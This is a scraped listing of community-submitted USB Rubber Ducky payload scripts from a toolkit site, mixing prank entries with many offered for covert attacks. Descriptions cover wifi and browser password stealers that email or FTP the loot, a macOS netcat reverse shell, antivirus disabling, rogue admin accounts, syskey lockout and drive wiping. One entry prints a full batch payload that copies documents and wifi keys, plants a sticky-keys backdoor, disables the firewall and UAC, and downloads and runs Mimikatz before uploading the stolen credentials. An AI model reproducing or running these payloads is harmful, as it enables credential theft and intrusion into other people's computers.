User Scripts

These are community submitted scripts. You can load the script in to the encoder by clicking the row.

Ducktoolkit.com has not checked the content of these scripts. It is your responsibility to ensure you understand what actions the encoded payloads will perform before use.

Script Name Author Description Tags Created
Hello World @hak5darren Simple payload to test a ducky on windows hello world 2016-10-10 08:30:16.710000
WiFi password grabber Siem Saves the SSID, Network type, Authentication and the password to Log.txt and emails the contents of Log.txt from a gmail account. Change the following things; ACCOUNT: Your gmail account PASSWORD: Your gmail password RECEIVER: The email you want to send the content of Log.txt to If you are using GMAIL you have to tell GMAIL to allow less secure apps to connect to your inbox. You should be able to find the switch in accounts settings. Your other option is to use one of the API codes with two-factor that GMAIL gives you. wifi, password, windows 2017-01-03 09:30:07.287000
Info gathering Ubuntu 1.0 Captain_Harlock The following script is an information gatherer script which collects info from a running Ubuntu OS and saves it to a file named "info_gathering.txt". The info that the script retrieves is the logged in username, the distribution and kernel version of the running system, the applicability of the shellsock bug, the mounted filesystems, information which is related to the Network adapters, availability of development tools (python, g++), contents of the hosts file and the listening TCP/UDP connections. Apart from that it attempts to find readable folders inside the /etc folder and also prints the SUID and GUID files. ubuntu,report, info 2016-10-10 09:12:57.434000
Reboot system Drogo REBOOT system Reboot 2016-10-19 21:15:21.661000
HotDog Background Anon Sets Desktop background as hotdog 2016-12-24 18:11:56.868000
Metasploit Powershell Payload Dj Saitto Metasploit payload, powershell payload. To preform this you need to startup metasploit framework and using the handler Script Web Delivery. wiki: https://www.rapid7.com/db/modules/exploit/multi/script/web_delivery Set the target as Powershell, generate the scrript and set it as a string inside the binary file. More questions and tricks, https://www.facebook.com/Problemet Metasploit Powershell Exploit 2016-10-22 13:06:17.636000
Thermostaten Keld Norman Load windows 98 install screen Joke fun windows98 2016-10-24 13:57:21.354000
Wallpaper Prank v2.0 ChuckMoe I decided to pick up one of the first Payloads, the Wallpaper Prank and modify it a bit. It does the same thing as the old Wallpaper Prank except for the fact that it flips the image and your Screen. The Desktop now looks the same as before but the movement of the mouse is inverted. Desktop, Wallpaper, Flip, Windows 2016-11-06 21:52:51.774000
Save WiFi info to USB RickyCee23 Target: Windows 7/10 This will grab the WiFi details and password that the computer is connected to. The password grab is from Thecakeisgit and Siem originally, but this will save into your USB of your choice. When put into the Encoder, feel free to delete the REM notes. Got any questions, concerns, problems, and revisions, email me at richardoc.2009@hotmail.com Wifi Grab, USB, Windows 2016-11-06 23:37:07.234000
WiFi Credentals to Duck ZILF WiFi Credentals to Duck Duck needs to be in twin duck mode No PowerShell needed Tested on win 8/10 WiFi Credentals, Twin Duck, Windows 2016-11-07 06:42:44.435000
PIXLE SAM RAFIEI when pluged into a mac, it will create a folder called .OSXhelper and create a .sh file called helper.sh, which will give u a netcat shell, before using this make sure u listen on the port u chose, LINUX: nc -l -p port, MAC: nc -l port. you will get a shell and from there u could upload a python backdoor using curl and exploit the target using metasploit. 2016-11-10 02:40:52.825000
lagrange lagrange normal 2016-11-10 10:29:04.901000
Payload - User Password Grabber Rivan Juthani This scrip takes user passwords and user information and email it to rubberduckyhacking@gmail.com, this is made by Rivan Juthani on 11-11-2016 | 10:34pm | 22:34 Password, Grabber,Password Grabber, Payload 2016-11-11 17:05:15
Hard Drive Wipe StewMan figure it out lul jk but this SHOULD delete everything on the targets primary drive prank,idk,not a good prank,lol 2016-11-21 04:05:42.239000
Meme Database llxw memes,database 2016-11-21 15:24:50.735000
Download/Exec (works with proxy ) dirtybit Download and Execute through the configured system proxy 2016-11-25 17:40:33.541000
UAC Administrative CMD Prompt B0rK Opens an Administrative Command Prompt in Windows with UAC Enabled 2016-11-29 19:38:47.471000
Aaron organising Disable windows defender. You may need to change the times depending on the pc. 2016-12-06 21:49:14.792000
Disable Windows Defender organising Disable windows defender, you may wanna change timings depending on the computer you're running it on. 2016-12-06 21:50:28.454000
homepage change bot126 Opens chrome, changes the homepage to pornhub and then closes. pornhub 2016-12-07 11:04:00.799000
2016-12-07 13:46:03.175000
Hak5Darren Hak5Darren Exfiltrate documents to Twin Duck USB Mass Storage as shown on Hak5 episodes 2112, 2113 and 2114. exfiltrate, twin duck 2016-12-07 23:17:29.510000
Exfiltrate Documents to USB Storage Hak5Darren Exfiltrate documents to Twin Duck USB Mass Storage as shown on Hak5 episodes 2112, 2113 and 2114. exfiltrate, twin duck, mass storage 2016-12-07 23:18:29.364000
Chrome pass 30 sec GMAIL Hazael BASIC PAYLOAD CHROME TO GMAIL 30 SEC USING PAGES IN THIS PAYLOAD Https://www.base64encode.org/ -Convert text: start pass.exe / stext "name of text file whitout" ".txt -To "c3RhcnQgcGFzcy5leGUgL3N0ZXh0IFNzYXAudHh0" -if u edit or rename just use agin the page Convert text to bat so fast * -It is necessary to execute the command "start pass.exe /stext file " -READ ABOUT http://www.nirsoft.net/utils/web_browser_password.html Payload mrgray's rubber hacks * Https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---mrgray%27s-rubber-hacks -http: //www.mediafire.com/? Nm1c62qt9w9z3wg -WebBrowserPassView.exe -> went to the "mediafire" page to get a direct link. SMTP CODE GMAIL DEL BAT -TXT -EXE DEL REGISTER -This payload is basic, you need to modify it to run hidden, or add some command that deletes the files from the recycle bin. (idk if it exist ) -Change the directory(I tried but I have problems) - -Check the keyboard, I have no problems with the US but in "ES" i have a lot Pdt: Any suggestion, or solution would appreciate contact me to: dprsirdpr@gmail.com REM BAT FILEMAKE IT IN TXT start pass.exe /stext Ssap.txt Basic payload 2016-12-10 04:00:24.788000
Rick Roll thebabbylord Opens never gonna give you up by Rick Astley on the computer at full volume. For use on mac computers. you can change the url to make it a different video. mac,prank 2016-12-11 02:09:56.225000
CMD Windows 10 UAC T-DaWg Open Command prompt with amdin rights in Windows 10 with UAC cmd windows10 uac 2016-12-14 18:19:30.104000
the0bone the0bone Leave a YouTube Channel Subscription YouTube, fun 2016-12-16 09:08:54.784000
OSX Hidden Files PLO OSX View hidden files quick modification OSX , FINDER Mod 2016-12-17 15:56:46.821000
TwinPayload OrangeGreen Just Some Fun. Twin Ducky Only. 2016-12-18 22:31:25.916000
List files in green in CMD @iAm_EMT Made to spook my brother. 2017-01-02 05:26:30.439000
Wallpaper Prank 3 DKO3030 Download an image from the internet and set as the wallpaper. This script works but could be improved. Wallpaper, Powershell, Windows 2017-01-02 23:53:59.031000
SHUTDOWN PC C.L.A.W shutdown a PC :) 2017-01-03 23:03:32.039000
Windows 8/10 Magic Computer Flajt Windows 8/10 Background Change Script with "talking Computer". Please modifiy it how you like it. My idea is that the "computer talk" and at the same time the script change the background without the users knowledge. Maybe you get it work. (Sorry for bad english) windows 8,windows,windows 10,Windows,Magic Computer 2017-01-05 16:50:15.256000
Voice Output Windows 10 prank Flajt This script launch the Windows 10 voice output. Maybe it work on Windows 8 and 8.1 It activate it permantly i don`t know if it survive reboots so tell me pleas and have fun with it. Windows, Windows 10,windows,windows 10, Voice Output,prank, 2017-01-05 19:21:22.786000
Voice Output Windows 10 prank Flajt This script launch the Windows 10 voice output. Maybe it work on Windows 8 and 8.1 It activate it permantly i don`t know if it survive reboots so tell me pleas and have fun with it. Windows, Windows 10,windows,windows 10, Voice Output,prank, 2017-01-05 19:42:57.899000
THE MATRIX THEDON101 THIS IS MI FIRST SCRIPT MADE IM 16 AND I HAVE A ARDUINO BAD USB.... THIS SCRIPT MAKE A .BAT FILE TO UR DESKTOP CALLED "TRIX" AND WHEN U CLICKE IT THE CMD PUPS UP AS THE MATRIX. YEAH II KNOW ITS SIMPLE BUT ITS FUN. I KNOW A LOT OF DELAYS LOL CONTACT IF ANY TRUBLE: afapontem@gmail.com BAD USB MATRIX 2017-01-06 05:50:06.109000
*NO DOWNLOAD* BACK GROUND PRANK V11111111111 THEDON101 THIS IS MY 2ND DUCKY SCRIPT. IT CHANGE THE BACK GROUND TO HIGH CONTRAST COLORS. FEEL FREE TO MOD IT *NO DOWNLOAS* WIN 10, HIGH CONTRAST 2 2017-01-06 07:29:55.019000
WIndows 10 Admin Flajt The Script create a Windows Admin account under WIndows 10. But at I try it it doesnt work at the point were i mark in the script if you know why send me a mail at matrimkurz@gmail.com windows,windows 10,admin 2017-01-07 15:22:34.676000
InSecure InSecure Set syskey with the password "password" and reboot Windows UAC must be completely disabled!!! - Tested on Windows 10 - syskey, InSecure, windows, reboot 2017-01-07 16:42:40.784000
Syskey with reboot InSecure Set syskey with the password "password" and reboot Windows UAC must be completely disabled!!! - Tested on Windows 7 and 10 - syskey, InSecure, windows, reboot 2017-01-07 16:44:54.390000
*** NEW!!! *** Syskey with reboot InSecure Set syskey with the password "password" and reboot Windows UAC must be completely disabled!!! - Tested on Windows 7 and 10 - syskey, InSecure, windows, reboot 2017-01-07 17:12:47.582000
Windows 10 shutdown loop Flajt This script will shutdown a windows user for ever. It create a .bat file that copy itself to the startup folder then the rubber ducky open cmd and start the run.bat (name of the .bat) and then the pc will shoutdown immediately. I dont know if it works the first part correct but i dont know if it run after a reboot. So pls digure it out and write it at the commants below. You use it on your on risk!!! windows 10,shutdown,loop,batch,"prank", 2017-01-08 15:13:20.951000
Windows 10 shutdown loop Flajt This script will shutdown a windows user for ever. It create a .bat file that copy itself to the startup folder then the rubber ducky open cmd and start the run.bat (name of the .bat) and then the pc will shoutdown immediately. I dont know if it works the first part correct but i dont know if it run after a reboot. So pls figure it out and write it at the commants below. You use it on your on risk!!! windows 10,shutdown,loop,batch,"prank", 2017-01-08 15:33:24.567000
Password web-browser Valentin SARRE This script allows you to steal web browsers passwords ans send the results by emails. Steal Web Browser password 2017-01-12 08:58:07.175000
Widows 10 Admin (work) Flajt This Script creates a Admin user with the name Phoenix and Password TeSter. windows 10, Admin 2017-01-18 10:55:12.682000
Interface scan (OSX and Debian-based OSes) Grim This is just a simple utility to run an ifconfig and an iwconfig on a computer's network interfaces, then it uploads the files to a FTP server and deletes the local files afterwards. There are spots where you need to enter your own credentials but they are highlighted. There are also places to comment out or uncomment lines of code depending on the target OS (which are also highlighted). Thank you for your time and consideration and I hope you enjoy the script. :) Mac, Linux, FTP, network 2017-01-22 06:30:17.410000
Quick install of Windows 98 - Prank vincent Opens chrome and goes fullscreen on fakeupdate.net to make the impression that you rekt their computer by installing windows 98 on it. Don't use on your boss computer because he will go to the helpdesk and they will find you... Prank 2017-01-24 20:26:25.305000
Fake update - win10 judge2020.com Will bring up the fakeupdate.net page for windows 10 and fullscreen it. great for going around best buy/walmart by judge2020 - website judge2020.com prank 2017-02-02 15:35:31.650000
v_ vulc_ OSX backdoor -> reverse shell Not tested yet, since I am waiting for USB Rubber Ducky. Original bash script was found on http://patrickmosca.com osx,backdoor,shell 2017-02-02 23:10:41.765000
OSX backdoor -> reverse shell vulc_ OSX backdoor -> reverse shell Not tested yet, since I am waiting for USB Rubber Ducky. Original bash script was found on http://patrickmosca.com osx,backdoor,shell 2017-02-02 23:12:42.476000
Data stealer @s4m0r This script will extract system information, all stored wifi profiles with passwords and also all currently running processes. It's written to work with the twinduck firmware. It requires this additional .bat file for the wifi profiles. Save it in the root of the ducky @echo off setlocal enabledelayedexpansion (for /f "tokens=2 delims=:" %%a in ('netsh wlan show profiles ^| findstr "Profile"') do ( set str=%%a set str=!str:~1! echo !str! )) >networks.txt recon,stealer 2017-02-03 22:51:14.481000
Online Passwords and User Hashes Raiden Uses the twin duck software to steal a list of online passwords and dumps user login hashes. They are stored on the rubber ducky. Requirements: Usb rubber ducky must be named 'D' WebBrowserPassView named 'p' stored on the ducky fgdump named 'f' stored on ducky password, hash, twin 2017-02-09 03:01:00.919000
test test test test 2017-02-14 22:04:48.504000
"Ultimate" Windows Backdoor Apex_1337 This Code: - opens admin cmd - bypass uac - create a backdoor -> pressing 5 times shift to get admin cmd, also working on login screen - enable RDP - disable uac by registry - disable windows firewall Apex_1337, windows, reboot, admin, cmd, command, prompt, backdoor, rdp, remote, desktop, protocol, program, firewall, uac, registry, bypass 2017-02-20 01:31:15.839000
Become a Domain Admin StinkyBliss This is a basic script to create a user account and make it a domain admin. there is no obfuscation though you may add some. I wrote this script for testing purposes only. It has been successfully tested on Servers 2012 R2 and 2016. 2017-02-24 05:02:44.726000
Disable Windows Defender WIN 8 & 10 mwatt This script will work in both win 8 and 10 to disable windows defender. Some keystrokes are dead in win 10, since they are meant for win 8 and vise versa. I left long delays for development. Happy Hunting! 2017-02-26 03:07:46.068000
Wifi and password involuntary backup Kasamuri @Philipp15055 Its a Small script that involuntary backs up all Online Passwords and wifi credentials http://www.nirsoft.net/password_recovery_tools.html (WebBrowserPassView.exe renamed to p.exe) and Twin duck volume named to D is required to function right) Delays might need to be adjusted for your pc iam working to improve the shorting of dada and adding some more data to me involuntary backed up Windows, WIFI, Online, Web Browser, 2017-03-01 19:48:18.420000
Firefox Password Snatcher WhereItsAt Copys saved google account password from firefox, bypasses UAC to save it to a text file and then emails it via powershell to a gmail account Firefox Version: 51.0.01 OS: Windows 7 firefox, windows7, password, stealer 2017-03-02 13:49:21.519000
Firefox Password Snatcher WhereItsAt Copys saved google account password from firefox, bypasses UAC to save it to a text file and then emails it via powershell to a gmail account Firefox Version: 51.0.01 OS: Windows 7 firefox, windows7, password, stealer 2017-03-02 13:50:27.700000
WiFi-Harvester -> Mail imp.so Saves the SSID, Network type, Authentication, Encryption and the password slightly invisible to A.txt and emails the contents of A.txt from a gmail account. After that it deletes the A.txt and the "Run-History". Works on german localized systems only. Change the following things; SENDER-MAILADRESS: Your gmail account SENDER-PASSWORD: Your gmail password RECIEVER-MAILADRESS: The email you want to send the content of A.txt to If you are using Gmail you have to tell Gmail to allow less secure apps to connect to your inbox. You should be able to find the switch in accounts settings. Your other option is to use one of the API codes with two-factor that Gmail provides you. If you are getting in trouble with anything, try a higher delay or insert a new one before the line that fails. wifi, credentials, harvest, mail, windows, german 2017-03-06 19:24:43.307000
PWN in one - PDF's PW's & RDP Mwatt ***Modified:*** Exfiltrate documents to Twin Duck USB Mass Storage as shown on Hak5 episodes 2112, 2113 and 2114. Requires files on drive listed in show notes and WebBrowserPassView.exe (renamed as p.exe) get the version that allows command line execution. Mods below are only to inject.bin and e.cmd. Script now includes in e.cmd: Apex_1337's RDP activation script Mubix, Clymb3r, Gentilkiwi - mimikatz 15 second script Kasamuri @Philipp15055's involuntary backup of passwords and SSID codes Export of ifconfig and external ip address. ***I also added an undo.cmd script below to reverse the RDP registry changes to help while testing (must be run as admin)**** ***Props listed below*** d.cmd and i.vbs are in HAK5 show notes (they have not been updated for this script) REM ************** Start e.cmd*********************** REM Start of Updated e.cmd (need to update locations of im.ps1 and rx.php in brackets, sans the brackets) @echo off @echo Installing Windows Update REM Combo e.cmd for staged payload -Mwatt REM Mad props to (I tried to collect all the names for each script): REM Diggster, Midnightsnake REM HAK5Darren for pulling together the staged payload for the show and for mimikatz script REM Mubix, Clymb3r, Gentilkiwi for 15 second mimikatz script REM Apex_1337 for the RDP script REM Kasamuri @Philipp15055 for the WebBrowserPassView & netsh wlan script REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious set hh=%time:~0,2% set hh=%hh: =0% SET CURRENT_DATE=%date:~4,2%%date:~7,2%%date:~10,4%_%hh%%time:~3,2%%time:~6,2% set dst=%~d0\slurp\%COMPUTERNAME%_%CURRENT_DATE% mkdir %dst% >>nul mkdir %dst%\wifi >>nul mkdir %dst%\ip >>nul if Exist %USERPROFILE%\Documents ( REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul REM Same as above but does not create empty directories xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul ) netsh wlan export profile key=clear folder=%dst%\wifi ipconfig > %dst%\ip\local_ip.txt nslookup myip.opendns.com. resolver1.opendns.com > %dst%\ip\ext_ip.txt REM run WebBrowserPassView.exe (renamed as p.exe) get version that allows command line commands REM Windows defender may detect p.exe file on USB usually after ~20 seconds, so unplug quickly or disable in inject.bin. %~d0\p.exe /stext %dst%\pws.txt REM **** below lines require run as admin (modifed inject.bat to insert lines to open CMD as admin and run same powershell line in original inject.bin) REM enable rdp reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 1 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSEnabled /t REG_DWORD /d 1 /f REM allow to login over rdp without password reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v "LimitBlankPasswordUse" /t REG_DWORD /d 1 /f REM login backdoor press 5 times shift to get command prompt reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f REM disable windows firewall netsh firewall set opmode disable REM disable uac reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d 0 /f REM Download and execute Invoke Mimikatz then upload the results powershell "IEX (New-Object Net.WebClient).DownloadString('[location of im.ps1]'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('[location of rx.php]', $output)" @cls @exit REM end of e.cmd REM ************************************************ REM ****************start undo.cmd******************** REM start of undo.cmd script to reverse the RDP changes for testing (must be run as admin) REM Turns off "enable rdp" reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 1 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "TSEnabled" /t REG_DWORD /d 0 /f REM Turns off "allow to login over rdp without password" reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v "LimitBlankPasswordUse" /t REG_DWORD /d 0 /f REM Turns off "login backdoor press 5 times shift to get command prompt" reg DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f REM Turns off "disable windows firewall" netsh firewall set opmode enable REM Turns off "disable uac" reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 1 /f reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d 1 /f 2017-03-13 21:42:31.359000
Download and execute with admin rights LionSec / @lionsec1 Download files from the internet and execute with admin rights using powershell. For example , if you use a metasploit backdoor , you will directly have administrator rights. ".hidden-directory" = where the downloaded file(s) will be stocked "website-url" = your website host or IP address (e.g example.com or 192.168.1.155) "filename" = Name of your program download,admin,execute,powershell,metasploit,hidden 2017-03-19 18:15:36.370000
e dasta Sony 2017-03-20 09:04:48.690000
Password and Network Config Grabber HexHax extracting browser passwords and sending them to an account on drivehq.com via ftp make a free account at drivehq.com edit the script with your drivehq username and password enjoy someones passwords download webbrowserpassview.exe from nirsoft website upload webbrowserpassview.exe from nirsoft website that you downloaded to the drivehq opens a command prompt as an administrator, moves window to the bottom of the screen, then makes a directory in the C: drive, runs ipconfig and saves it to a txt file, then connects via ftp to drive hp and downloads the password grabber, runs it and saves it to a txt file, sends text file to via ftp to your account, then it cleans itself up and exits, process takes about a minute, may have to adjust delays based on computer and internet performance Password, Windows, Password Grabber, Network Config Grabber 2017-03-20 19:49:08.008000
Reconnaissance HexHax https://www.drivehq.com/ - head here to make a free account http://www.nirsoft.net/ - head here to download: MyLastSearch.exe ProduKey.exe TurnedOnTimesView.exe UserProfilesView.exe SecuritySoftView.exe WirelessNetView.exe and wul.exe (there are plenty more, just have to find which ones work without popping up their own GUI) http://www.mediafire.com/file/08746vmgjuou7db/BPD.exe - then here to download BPD.exe upload these programs to your drivehq account and then run this script with your username and password to ftp back and forth and get the job done, est. time overall is about 3 minutes and then victim gets rickrolled :) also this script cleans up after itself WARNING - I AM NOT RESPONSIBLE FOR WHAT YOU DO WITH THIS SCRIPT **EDUCATIONAL PURPOSES ONLY** ~HexHax Reconnaissance, HexHax, Rubber Ducky, Ducky, Excessive Information 2017-03-22 03:18:01.317000
Free Donuts JustinSt-Laurent This will make a user send out an email indicating that they will be buying donuts through Outlook. The purpose was to punish those who did not lock their systems. Change - email@address.com Outlook 2017-03-22 16:09:14.536000
Sandstorm Prank Hukaria Powershell Sandstorm Prank This is my first Duckyscript, thought i would test the capabilities of scripts within scripts, not really as useful as the other scripts however a good laugh. This script will: - Changes Volume to 100% - Runs Sandstorm - Continuously Locks PC until 31 Seconds have passed - Toggles Locks On/Off - Changes Mouse Clicks - Spams DUDUDU in cmd windows The script can be adjusted to reduce the annoyance level you may cause: -Changing the x variable will change the scripts length (199 seems a reasonable amount and around 750 is the full duration of the song) -All of the oShell.SendKeys("{PGUP}") can be removed to keep the volume the same. -Line 33 can be removed to stop the mouse buttons switching. -Line 41 can be removed to stop the PC auto locking. Prank 2017-03-23 23:18:39.331000
Ducky Admin HexHax Make yourself an admin on someones computer (only works if the user is an admin on the computer you want to be admin on) example would be your friends personal computer replace [USERNAME] & [PASSWORD] with your username and password Admin, Ducky Admin, Duck, User Account 2017-03-24 05:08:00.992000
hyWse hyWse_ Opens CMD w/ Admin-Rights cmd, admin 2017-04-04 14:27:13.545000
yt sub and like Nalon Subscribe and like your video replace the were it says "LINK TO THE VIDEO YOU WANT LIKED" to the video url and where it says "YOUR CHANNEL ID" replace it with your youtube channel id 2017-04-06 16:45:03.753000
YT SUB N LIKE Nalon Subscribe and like your video replace the were it says "LINK TO THE VIDEO YOU WANT LIKED" to the video url and where it says "YOUR CHANNEL ID" replace it with your youtube channel id YT,SUB,LIKE,i messed up other one 2017-04-06 16:48:27.502000
Disable variable AV mWatt This is for educational purposes only! Only use on authorized systems. I am not responsible for your actions. The script below will disable some AV, in case you would like to install programs as a sysadmin. Tested on the latest AVG and older symantic versions... Please update if you have other AV's that you can test. 2017-04-06 20:34:51.835000
p0wc0w Grab all wireless networks with the corresponding key, export to csv file and send via email (powershell). Command prompts a bit obfuscated, and powershell hidden to keep screen activity to a minimum. WiFi Credentals, exfiltrate mail 2017-04-15 19:56:16.589000
Tree command "Hackig" Prank @Ddawg747 Opens Command prompt, changes to C drive, changes text color to green, clears previous commands, runs tree command prank, windows, cmd 2017-04-17 03:51:05.395000
ArchInstallVM b0n3z This will install arch linux from the iso to a VirtualBox VM. 2017-04-22 22:31:08.376000
gg 571 Ducku Duck gg 2017-04-27 00:27:25.755000
ducky user linux Ron4ld0 This script will add an user called ducky with root permission and the password USBRUBBER (this must be run in a terminal with root permission) 2017-04-28 14:38:14.136000
jodiendo wins tasss jodiendo wins win, out 2017-05-01 04:58:45.472000
AutoRun any Program on a shared drive Windows 10 thecurisouscouch AutoRun any Program on a shared drive Windows 10. (I was installing Revit 2017 off our server, use your own path in the single quotes) 2017-05-03 18:03:22.022000
Little Worm BlackBoot This program executes a for statement that goes one by one and for each item in the list executes the Start command. The greater the last number in the list, the more the Start command will be executed and the computer will be locked. Tested on Windows XP, Windows Vista, Windows 7, Windows 8, Windows 10. Author: BlackBoot. Windows, Worm 2017-05-09 18:10:57.909000
rfkill 0 & rfkil 1 spyder @TRIsecHackers Hello this is my first public script so judge i could give a few words left 2017-05-22 01:46:57.291000
Matrix V2 Harvey This is a script that will launch a matrix cmd. This is also a updated version of THEDON101 script so most of the credit goes to him :) plus i haven't actually tried this script myself as my rubber ducky broke :( so plz tell me if it doesn't work in the comments :) enjoy! matrix updated version 2017-05-22 21:50:56.593000
USB Intruder B0rk USB Intruder for TwinDucky Requirements - Download the USB_Intruder payload from the Hak5\BashBunny github repo and delete the payload.txt. Copy the rest of the USB_Intruder contents to the Ducky's storage and use the following for the inject.bin **Delays will need to be adjusted to suit the hardware used in testing** USB Intruder 2017-05-24 22:08:13.649000
$NFT Windows Crasher Jonny Banana A Simple Script for Rubber Ducky which Exploits Windows $MFT Vulnerability $MFT is used by NTFS systems to manage some metadata. This fallace has recently been discovered, which has not yet been closed. Works on windows 7, 8 and vista, dont work on windows 10. I think work on Xp and earlier. This Script dont require any special firmware on the Rubber Ducky (TwinDuck Firmare etc.). The system crash lasts until the machine is switched off, or until the blue screen of death appears;) A system crash demonstration using the two strings with the following paths: c:$MFT & c:$MFT\123 can be found here: https://www.youtube.com/watch?v=vYL9UQRwUZc&t=6s you can fiind this and other Rubber Ducky SCripts on my Github: https://github.com/JonnyBanana/-MFT-Duck-Crasher https://github.com/JonnyBanana or on My Youtube Channel https://www.youtube.com/channel/UCGpltr2aMuNZqfBN6y51kCw Enjoi it!!! crash windows, windows 7, windows vista, windows 8, crash, 2017-05-31 03:24:52.419000
f f f f 2017-05-31 14:11:32.069000
Hot Dog Background FR Manzvador Hot Dog Background for french language hot,dog,fr,french,fond,ecran,background 2017-06-10 10:38:20.789000
insequrities This script does a lot, but has some huge key features which are worth going over. It displays the current WiFi Connections credentials by exploiting the * character in Command Prompt, which acts as "everything". So in this script we are using the * in netsh wlan show profile name=* key=clear Thus, regardless of the access points name, so long as its wifi it will display the key(password) Another thing we are "exploiting" is the ability to copy command prompts output, and sending it via SMTP through Powershell. The Notepad file which will copy all of command Prompts output is located in the windows temp folder (C:\Windows\Temp\XInfo.txt) which is a relatively common location, but also not often looked through. Another thing this script does is display open ports on the computer. But we don't really need to go in depth on that Finally the script creates an access point with the credentials ssid=Insecure key=Insecurities then drops the windows firewall, if not already dropped. This script is sort of buggy and very slow at the moment because its still in testing, but feel free to modify it so that it's functional to your liking wifi pass grab,email report 2017-06-16 02:06:53.911000
Windows93 Prank Arkie A funny prank to pull on coworkers and friends it makes them think their computer is running a windows 93. It takes the computer to the windows93 web page and puts web browser in full screen making it look real. 2017-06-29 16:31:06.798000
Windows93 Prank Arkie Pierce A funny prank to pull on coworkers and friends it makes them think their computer is running a windows 93. It takes the computer to the windows93 web page and puts web browser in full screen making it look real. 2017-06-29 16:33:53.044000
Rick Roll Frank the spaghetti man Rick Roll wallpaper change and play youtube video never gonna give you up in full screen. If you run into any bugs try extending the delays. You can also add in a max volume function. Must have internet connection to work. Works in Windows 10. I found a partial script online to change wallpaper and began editing it. Most information was found by being a proficient Googler and using the github and hak5 forums. 2017-07-21 19:05:41.256000
DarkN3ss jLynx_DarkN3ss Blue Screen of Death! Only works on Windows 7 and earlier. BSOD, Blue Screen of death 2017-07-30 21:40:12.283000
Hello World gsgsh Hello World Hello World 2017-07-30 22:48:22.151000
test 3245 @tset575 test 3245 test 3245 2017-07-30 22:53:01.946000
KUBUNTU Multi-Desktop @Ted Saari Creates multiple desktops in KUBUNTU and then restores back to normal. KUBUNTU, LINUX, UBUNTU 2017-08-04 19:57:03.156000
Text to voice @theoisle This script was tested on Windows 7. It uses the text to speech feature and use the selected voice to say "This is a test of the emergency broadcast system." text to voice, speech 2017-08-05 02:37:51.355000
Win 7 Media player @theoisle Tested in Windows 7. Opens media player and plays the "ding.wav" several times and then loads flourish.mid and plays it repeating until you type a CRT+T. Windows 7, Media Player, Music Player, Sound Player 2017-08-06 21:04:10.407000
Windows 10 Grab Password Web and Send Via Email KaliStealth666 OS . WINDOWS 10 Professional - TESTED ( 8 - 7 windows - maybe) NAME_SCRIPT . KaliStealthBOT Service . $FREE ************************************************************************************ I Can Grab a PWD Web Firefox - Chrome - IE and Send Via Email. ************************************************************************************* HOW TO SET: Register account SMTP free here https://app.smtp2go.com and *PUT-LOGIN-HERE* & *PUT-YOUR-PWD* then *INSERT-YOUR@EMAIL-HERE* where you want receive the goods :) __________________________________________________________ 1.$url = 'https://1fichier.com/?txl995libj - Pass Stealer Software 2.$url = 'https://1fichier.com/?d1xgmwc5bl - sendEmail Client *** You can change this with every similar software __________________________________________________________ See u.. windows10 grab password steal pwd web and send via email 2017-08-18 05:48:52.786000
atao Export Config IP, Route, Wireless Key on FTP Server ftp, wireless key, upload 2017-08-23 20:00:35.205000
Hidden cron entry that quacks rumhamFantastic A first attempt at a duck script. A simple script that installs a cron entry which uses the mac say app to quack every month on the 15th at 3:14 The bash history history is copied to a tmp file and rewritten when done to hide the cron commands. 2017-09-08 03:36:33.199000
Ducky Admin bruno Ducky Admin 2017-09-08 08:17:02.370000
Disable avast Blue Disables Avast's service. Tweek or remove DEFAULT_DELAY to make it faster. Useful as most even legitimate files are tagged and disabled by avast. Closes all windows after done and is chainable into other programs like download and run. 2017-09-10 17:41:39.748000
Add Windows local Administrator UK_TinT This is for when a Windows user has left their computer logged in with local admin rights. The script creates a new user then adds it to the local administrators group Windows, local administrator 2017-09-13 17:05:35.886000
